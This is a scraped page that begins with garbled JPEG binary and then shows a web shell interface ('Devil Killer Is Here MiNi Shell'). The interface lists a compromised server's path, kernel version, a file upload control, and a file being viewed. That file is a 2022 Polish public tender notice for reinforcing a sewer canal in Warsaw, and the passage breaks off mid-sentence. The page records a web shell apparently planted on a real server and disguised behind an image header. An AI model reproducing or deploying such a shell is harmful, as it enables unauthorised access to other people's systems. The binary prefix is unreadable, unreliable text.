JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220824/0031752001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Zapr. i wyk.zabezpieczenia kanału klasy pierwszej zlok. na pl.Na Rozdrożu w Warszawie na odcinku od komory 1887 do komory 1779 w ramach zad.inw.pn.:„Budowa pomnika Bitwy Warszawskiej 1920 – część II” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stołeczny Zarząd Rozbudowy Miasta</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000162665</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Senatorska, 29/31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-099</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 277-58-00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">22 277-58-05</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">szrm@szrm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szrm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapr. i wyk.zabezpieczenia kanału klasy pierwszej zlok. na pl.Na Rozdrożu w Warszawie na odcinku od komory 1887 do komory 1779 w ramach zad.inw.pn.:„Budowa pomnika Bitwy Warszawskiej 1920 – część II” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d3783645-22e1-11ed-b8b2-9a321cc30829</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00317520</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021196/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Zaprojektowanie i wykonanie robót budowlanych dotyczących zabezpieczenia kolektora kanalizacyjnego w ramach zadania inwestycyjnego pn.: Budowa pomnika Bitwy Warszawskiej 1920 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https//szrm.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https//szrm.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.6.1. Zamawiający informuje, że<br/>dokumenty elektroniczne przekazywane za pośrednictwem środków komunikacji elektronicznej, o których mowa w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia<br/>publicznego lub konkursu, są sporządzane w jednym z formatów danych określonych w przepisach wydanych na podstawie art. 18<br/>ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>3.6.2. W przypadku składania oświadczeń woli lub oświadczeń wiedzy w formie elektronicznej Zamawiający rekomenduje złożenie<br/>ich w formacie „pdf&#34; z kwalifikowanym podpisem elektronicznym osadzonym wewnątrz pliku (tzw. PAdES).<br/>Ponadto, w celu uniknięcia ewentualnych problemów w trakcie weryfikacji złożonych podpisów, Zamawiający rekomenduje użycie<br/>kwalifikowanego znacznika czasu przy stosowaniu podpisu elektronicznego.<br/>Ponadto, w przypadku stosowania przez Wykonawcę znacznika podpisu Zamawiający zaleca umieszczać ww. znacznik w taki<br/>sposób, aby nie zasłaniał treści podpisywanego dokumentu.<br/>3.6.3. Używanie Platformy w pełnym zakresie wymaga spełnienia minimalnych wymagań sprzętowo- aplikacyjnych, w tym:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej<br/>w najnowszej wersji, w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3.6.4. Dopuszcza się następujące formaty plików przekazywanych przez Wykonawców za pośrednictwem platformy (pliki do<br/>wielkości 100 MB):<br/>1) Do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub multimedialne dopuszcza się następujące formaty danych:<br/>txt, rtf, xps, odt, ods, odp, xls, ppt, docx, xlsx, pptx, csv, pdf.<br/>2) Do danych zawierających informację graficzną dopuszcza się następujące formaty danych: jpg, jpeg, tif, tiff, geotiff, png, svg.<br/>3) Do danych zawierających informację dźwiękową lub filmową dopuszcza się następujące formaty danych: wav, mp3, avi, mpg,<br/>mpeg, mp4, m4a, mpeg4, ogg, ogv.<br/>4) Do danych zawierających grafikę wektorową dopuszcza się format danych: dwg.<br/>5) Do kompresji (zmniejszenia objętości) dokumentów elektronicznych dopuszcza się następujące formaty danych: zip, tar, gz, gzip,<br/>7z.<br/>6) Do elektronicznego podpisywania, opatrywania pieczęcią elektroniczną i szyfrowania dokumentów elektronicznych dopuszcza się<br/>następujące standardy podpisów i szyfrowania: XMLsig, XAdES, CAdES, ASIC, XMLenc. Pobrane w formacie XML z Elektronicznej<br/>Platformy Usług Administracji Publicznej, podpisane przy pomocy Profilu Zaufanego dokumenty pdf dopuszcza się do wielkości pliku<br/>10 MB.<br/>3.6.5. Plik załączony przez Wykonawcę na Platformie zakupowej i zapisany, widoczny jest w systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>składania ofert.<br/>3.6.6. Czasem odbioru danych przez Platformę jest data oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://szrm.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Postanowienia związane z ochroną danych osobowych zawarte są w Rozdziale XXIV<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP-II-WI/28/ZPIK/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: zaprojektowanie i wykonanie zabezpieczenia kanału klasy pierwszej zlokalizowanego na<br/>pl. Na Rozdrożu w Warszawie na odcinku od komory 1887 do komory 1779 w ramach zadania inwestycyjnego pn.: „Budowa<br/>pomnika Bitwy Warszawskiej 1920 – część II”.<br/>Przedmiotem zamówienia jest wykonanie dokumentacji projektowej wzmocnienia kolektora metodą paneli samonośnych<br/>(oraz wszelkich niezbędnych opracowań zgodnie z ustaleniami na spotkaniach koordynacyjnych), który powinien zapewnić<br/>bezpieczne funkcjonowanie sieci kanalizacyjnej w przypadku wystąpienia wskazanych poniżej wariantów awaryjnych oraz w<br/>zakresie oddziaływań wzajemnych kanału i budowli pomnika:<br/>- w przypadku rozszczelnienia, spękania lub zawalenia konstrukcji murowanej kolektora zastosowane wzmocnienie powinno<br/>zapewnić bezawaryjne funkcjonowanie kanału. Zastosowana technologia – panel powinien posiadać właściwości<br/>samonośne, gdzie wystąpienie ww. awarii powinno w pełni zabezpieczyć ciągłość pracy sieci oraz wykluczyć ryzyko<br/>negatywnego oddziaływania na konstrukcję pomnika;<br/>- w przypadku wystąpienia nacisku fundamentu lub innego elementu pomnika na kolektor zastosowane wzmocnienie<br/>powinno cechować się odpowiednią wytrzymałością na ewentualne obciążenia zewnętrzne,<br/>- w czasie trwania robót budowlanych wznoszenia pomnika.<br/>2. Przedmiot zamówienia obejmuje w szczególności:<br/>2.1. Opracowanie dokumentacji projektowej, w tym:<br/>1) pozyskanie materiałów wyjściowych do projektowania, w tym:<br/>a) inwentaryzacji wraz z monitoringiem kanału za pomocą kamery inspekcyjnej,<br/>b) mapy do celów projektowych,<br/>c) innych niezbędnych materiałów do opracowania kompletnej dokumentacji.<br/>2) wykonanie projektu zagospodarowania terenu,<br/>3) wykonanie projektu konstrukcji wzmocnienia kanału,<br/>4) wykonanie projektu instalacji sanitarnych, składającego się z: szczegółowego opisu, profilu kolektora ściekowego z<br/>zaznaczonymi kolizjami, przekroi i detali,<br/>5) wykonanie wszelkich innych opracowań, jeśli będą niezbędne do opisania zakresu, jaki należy wykonać by prawidłowo<br/>wzmocnić kolektor ściekowy,<br/>6) wykonanie projektów robót niezbędnych do wykonania w komorach 1887 i 1779, umożliwiających wzmocnienie kanału,<br/>7) wykonanie projektów rozwiązań tymczasowych jeśli są konieczne do zastosowania w celu wykonania wzmocnienia<br/>kanału, takich jak np. czasowa organizacja ruchu, komora startowa, przekładka sieci lub tzw. bypass,<br/>8) wykonanie przedmiarów robót,<br/>9) wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót (STWiOR),<br/>10) uzyskanie wszystkich wymaganych prawem opinii, uzgodnień i sprawdzeń rozwiązań projektowych oraz dokumentów w<br/>zakresie wynikającym z przepisów prawa lub wymagań uprawnionych podmiotów uzgadniających projekty. Uzyskanie<br/>niezbędnych decyzji w tym administracyjnych umożliwiających wykonanie wzmocnienia kolektora ściekowego<br/>usytuowanego na Pl. Na Rozdrożu w Warszawie. Projekt powinien uzyskać akceptację MPWiK.<br/>2.2. Wykonanie robót budowlanych w zakresie wynikającym z dokumentacji projektowej oraz Programu Funkcjonalno-<br/>Użytkowego.<br/>3. Poszczególne opracowania należy wykonać w formie:<br/>1) papierowej w ilości po 5 egzemplarzy każde;<br/>2) elektronicznej po 2 egz. na nośniku elektronicznym CD lub DVD, w tym:<br/>a) materiały wyjściowe, opracowania projektowe – dla rysunków w formacie (*.dwg)/(*.dxf) (w układzie zgodnym z<br/>Rozporządzeniem Rady Ministrów z dnia 15.10.2012 r. w sprawie państwowego systemu odniesień przestrzennych) oraz<br/>(*.pdf), dla tekstu w formacie (.pdf) i (.doc);<br/>b) przedmiary - w programie Norma lub kompatybilnym w formacie (*.ath) i (*.pdf);<br/>c) STWiOR - w programie WORD lub kompatybilnym w formacie (*.doc) lub (*.rtf) oraz (*.pdf).<br/>3) Załączniki formalno-prawne w tym: opinie, ekspertyzy, pozwolenia i uzgodnienia Wykonawca przekaże w oryginałach i na<br/>nośniku elektronicznym w formacie (.pdf).<br/>4) Wykonawca przekaże Zamawiającemu formę elektroniczną dokumentów objętych przedmiotem zamówienia, która będzie<br/>zgodna z formą papierową ww. opracowań, tj. forma elektroniczna w formacie (.pdf) będzie zawierać wszelkie podpisy i<br/>pieczątki, naniesione na papierze, w trakcie dokonywanych ustaleń i uzgodnień.<br/>4. Szczegółowy zakres przedmiotu zamówienia określa dokument p.n.: „Program Funkcjonalno-Użytkowy” (Załącznik nr 11<br/>do SWZ).<br/>5. Dokumentacja projektowa powinna być wykonana zgodnie z wytycznymi MPWiK wskazanymi w pismach (Załącznik nr 11<br/>do SWZ):<br/>- PRO.DWP.840.675.2021.096424.21.PS z dnia 12.04.2021 r.<br/>- PRO.DWP.840.1682.2021.226970.21.PS z dnia 2.08.2021 r.<br/>- PRO.DWP.840.1183.2022.147784.22.AGS z dnia 10.06.2022 r.<br/>- PRO. DWP.840.1406.2022.176188.22.AGS z dnia 1.07.2022 r.<br/>6. Ponadto opis przedmiotu zamówienia określają: Projektowane Postanowienia Umowy (dalej PPU) stanowiące Załącznik<br/>Nr 10 do SWZ, które zostaną wprowadzone do treści tej umowy.<br/>7. Wymagania dotyczące zatrudnienia przez Wykonawcę osób na podstawie umowy o pracę:<br/>1) Zamawiający wymaga zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących następujące<br/>czynności w zakresie realizacji zamówienia:<br/>a) roboty sanitarne.<br/>2) W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy<br/>odnośnie spełniania przez wykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w<br/>punkcie 1) czynności. Zamawiający uprawniony jest w szczególności do:<br/>a) żądania oświadczeń w zakresie potwierdzenia spełniania ww. wymogów i dokonywania ich oceny,<br/>b) żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogów,<br/>c) przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>3) W trakcie realizacji zamówienia na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie,<br/>Wykonawca przedłoży Zamawiającemu określony/e w PPU dowód/dowody w celu potwierdzenia spełnienia wymogu<br/>zatrudnienia przez Wykonawcę na podstawie umowy o pracę osób wykonujących czynności wskazane w pkt 1).<br/>Dokumenty, o których mowa powyżej powinny zawierać informacje niezbędne do weryfikacji zatrudnienia na podstawie<br/>umowy o pracę, w szczególności: imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy<br/>o pracę oraz zakres obowiązków pracownika.<br/>4) Z tytułu niespełnienia przez wykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących<br/>wskazane w punkcie 1) czynności zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez wykonawcę kary<br/>umownej w wysokości określonej w PPU. Niezłożenie przez wykonawcę w wyznaczonym przez zamawiającego terminie<br/>żądanych przez zamawiającego dowodów w celu potwierdzenia spełnienia przez wykonawcę wymogu zatrudnienia na<br/>podstawie umowy o pracę traktowane będzie jako niespełnienie przez wykonawcę lub podwykonawcę wymogu zatrudnienia<br/>na podstawie umowy o pracę osób wykonujących wskazane w punkcie 1) czynności.<br/>5) W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez wykonawcę, zamawiający może<br/>zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <p class="mb-0">45232410-9 - Roboty w zakresie kanalizacji ściekowej</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45453100-8 - Roboty renowacyjne</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <p class="mb-0">90470000-2 - Usługi czyszczenia kanałów ściekowych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym.<br/>Określenie warunków:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2. Uprawnienia do prowadzenia działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Określenie warunków:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3. Sytuacja ekonomiczna lub finansowa.<br/>Określenie warunków:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4. Zdolność techniczna lub zawodowa.<br/>Określenie warunków:<br/>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>4.1. Posiada doświadczenie:<br/>4.1.1. posiada doświadczenie w okresie ostatnich trzech lat (liczonych wstecz od dnia, w którym upływa termin składania<br/>ofert), a jeżeli okres powadzenia działalności jest krótszy – w tym okresie, w wykonaniu1) co najmniej jednej usługi<br/>polegającej na wykonaniu dokumentacji projektowej albo dokumentacji projektowej i przetargowej na wzmocnienie<br/>istniejącego lub wykonanie nowego kanału ściekowego/wodnego o wysokości lub średnicy minimum 110 cm.,<br/>1) Za wykonaną usługę Zamawiający rozumie taką usługę, która została zrealizowana na rzecz podmiotu<br/>(Zamawiającego/Odbiorcę) w ramach danej umowy i odebrana przez ten podmiot, jako wykonana należycie. Zamawiający<br/>zastrzega sobie prawo do ewentualnego sprawdzenia prawdziwości przedstawianych danych, które będą wyszczególnione<br/>w ofercie.<br/>4.1.2. posiada doświadczenie w okresie ostatnich pięciu lat (liczonych wstecz od dnia, w którym upływa termin składania<br/>ofert), a jeżeli okres powadzenia działalności jest krótszy – w tym okresie, w wykonaniu2) co najmniej jednej roboty<br/>budowlanej polegającej na wzmocnieniu kanału ściekowego/wodnego o wysokości lub średnicy minimum 110 cm.<br/>2) Za wykonaną robotę budowlaną Zamawiający rozumie taką robotę, która została zrealizowana na rzecz podmiotu<br/>(Zamawiającego/Odbiorcę) i odebrana przez ten podmiot, jako wykonana należycie. Zamawiający zastrzega sobie prawo do<br/>ewentualnego sprawdzenia prawdziwości przedstawianych danych.<br/>4.2. Dysponuje osobami posiadającymi kwalifikacje zawodowe lub doświadczenie:<br/>4.2.1. do sprawowania funkcji projektanta, posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie w zakresie projektowania – bez ograniczeń – w specjalności konstrukcyjno – budowlanej;<br/>4.2.2. do sprawowania funkcji projektanta, posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie w zakresie projektowania – bez ograniczeń – w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>4.2.3. do sprawowania funkcji projektanta posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie w zakresie projektowania – bez ograniczeń – w 